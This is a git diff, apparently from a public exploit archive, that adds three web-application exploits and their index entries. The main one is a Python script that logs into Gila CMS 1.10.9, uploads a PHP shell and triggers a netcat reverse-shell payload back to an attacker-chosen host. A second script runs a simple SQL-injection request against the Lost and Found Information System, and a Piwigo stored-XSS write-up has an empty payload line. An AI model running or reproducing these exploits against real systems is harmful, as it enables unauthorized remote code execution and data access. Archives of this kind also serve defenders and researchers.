diff --git a/exploits/php/webapps/51569.py b/exploits/php/webapps/51569.py new file mode 100755 index 0000000000..3a4d23cccb --- /dev/null +++ b/exploits/php/webapps/51569.py @@ -0,0 +1,100 @@ +# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) +# Date: 05-07-2023 +# Exploit Author: Omer Shaik (unknown_exploit) +# Vendor Homepage: https://gilacms.com/ +# Software Link: https://github.com/GilaCMS/gila/ +# Version: Gila 1.10.9 +# Tested on: Linux + +import requests +from termcolor import colored +from urllib.parse import urlparse + +# Print ASCII art +ascii_art = """ + ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗ +██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝ +██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ +██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ +╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗ + ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ + + by Unknown_Exploit +""" + +print(colored(ascii_art, "green")) + +# Prompt user for target URL +target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ") + +# Extract domain from target URL +parsed_url = urlparse(target_url) +domain = parsed_url.netloc +target_url_2 = f"http://{domain}/" + +# Prompt user for login credentials +username = input("Enter the email: ") +password = input("Enter the password: ") + +# Create a session and perform login +session = requests.Session() +login_payload = { + 'action': 'login', + 'username': username, + 'password': password +} +response = session.post(target_url, data=login_payload) +cookie = response.cookies.get_dict() +var1 = cookie['PHPSESSID'] +var2 = cookie['GSESSIONID'] + +# Prompt user for local IP and port +lhost = input("Enter the local IP (LHOST): ") +lport = input("Enter the local port (LPORT): ") + +# Construct the payload +payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f" +payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}" + +# Perform file upload using POST request +upload_url = f"{target_url_2}fm/upload" +upload_headers = { + "Host": domain, + "Content-Length": "424", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2", + "Accept": "*/*", + "Origin": target_url_2, + "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}", + "Connection": "close" +} +upload_data = f''' +------WebKitFormBoundarynKy5BIIJQcZC80i2 +Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7" +Content-Type: application/x-php + + + +------WebKitFormBoundarynKy5BIIJQcZC80i2 +Content-Disposition: form-data; name="path" + +tmp +------WebKitFormBoundarynKy5BIIJQcZC80i2 +Content-Disposition: form-data; name="g_response" + +content +------WebKitFormBoundarynKy5BIIJQcZC80i2-- +''' + +upload_response = session.post(upload_url, headers=upload_headers, data=upload_data) + +if upload_response.status_code == 200: + print("File uploaded successfully.") + # Execute payload + response = session.get(payload_url) + print("Payload executed successfully.") +else: + print("Error uploading the file:", upload_response.text) \ No newline at end of file diff --git a/exploits/php/webapps/51570.py b/exploits/php/webapps/51570.py new file mode 100755 index 0000000000..5b51ff3a33 --- /dev/null +++ b/exploits/php/webapps/51570.py @@ -0,0 +1,24 @@ +# Exploit Title: Lost and Found Information System v1.0 - SQL Injection +# Date: 2023-06-30 +# country: Iran +# Exploit Author: Amirhossein Bahramizadeh +# Category : webapps +# Dork : /php-lfis/admin/?page=system_info/contact_information +# Tested on: Windows/Linux +# CVE : CVE-2023-33592 +import requests + +# URL of the vulnerable component +url = "http://example.com/php-lfis/admin/?page=system_info/contact_information" + +# Injecting a SQL query to exploit the vulnerability +payload = "' OR 1=1 -- " + +# Send the request with the injected payload +response = requests.get(url + payload) + +# Check if the SQL injection was successful +if "admin" in response.text: + print("SQL injection successful!") +else: + print("SQL injection failed.") \ No newline at end of file diff --git a/exploits/php/webapps/51572.txt b/exploits/php/webapps/51572.txt new file mode 100644 index 0000000000..c2d695ca5d --- /dev/null +++ b/exploits/php/webapps/51572.txt @@ -0,0 +1,15 @@ +#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated) +#Date: 25 June 2023 +#Exploit Author: Okan Kurtulus +#Vendor Homepage: https://piwigo.org +#Version: 13.7.0 +#Tested on: Ubuntu 22.04 +#CVE : N/A + +# Proof of Concept: +1– Install the system through the website and log in with any user authorized to upload photos. +2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded. +3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered. + +#Payload + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bdcc933bbd..7c8702a399 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -19046,6 +19046,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,, 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,, 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,, +51569,exploits/php/webapps/51569.py,"Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)",2023-07-06,"Omer Shaik",webapps,php,,2023-07-06,2023-07-06,0,,,,,, 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,,2020-06-16,2020-06-16,0,CVE-2020-5515,,,,, 46557,exploits/php/webapps/46557.txt,"Gila CMS 1.9.1 - Cross-Site Scripting",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-19,2019-03-19,0,CVE-2019-9647,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.com1.9.1.zip, 49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,,2021-01-12,2021-01-12,1,,,,,, @@ -22573,6 +22574,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php,,2008-02-13,2016-11-14,1,OSVDB-41835;CVE-2008-0803;OSVDB-41834;OSVDB-41833;OSVDB-41832;OSVDB-41831;OSVDB-41830;OSVDB-41829;OSVDB-41828;OSVDB-41827;OSVDB-41826;OSVDB-41825;OSVDB-41824;OSVDB-41823;OSVDB-41822;OSVDB-41821;OSVDB-41820;OSVDB-41819;OSVDB-41818;OSVDB-41817;OSVDB-41816;OSVDB-41815;OSVDB-41814;OSVDB-41813;OSVDB-41812;OSVDB-41811;OSVDB-41810;OSVDB-41809;OSVDB-41808,,,,http://www.exploit-db.comlookstrike-v0.9.zip, 26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3988;OSVDB-21328,,,,,https://www.securityfocus.com/bid/15665/info 7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,, +51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,, 48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,, 48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",webapps,php,,2007-12-09,,1,OSVDB-52880;OSVDB-52879;OSVDB-52877,,,,, @@ -27604,6 +27606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42098,exploits/php/webapps/42098.txt,"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting",2017-05-31,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip, 42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip, 42443,exploits/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",webapps,php,,2017-08-10,2017-08-10,0,,,,,http://www.exploit-db.comuser_tags-0.9.0.zip, +51572,exploits/php/webapps/51572.txt,"Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-07-06,"Okan Kurtulus",webapps,php,,2023-07-06,2023-07-06,0,,,,,, 14973,exploits/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,webapps,php,,2010-09-11,2010-09-12,1,OSVDB-67968,,,,http://www.exploit-db.compiwigo-2.1.2.zip, 33814,exploits/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,webapps,php,,2010-03-31,2014-06-19,1,CVE-2010-1453;OSVDB-64359,,,,,https://www.securityfocus.com/bid/39144/info 9962,exploits/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,webapps,php,,2009-10-18,,1,,,,,,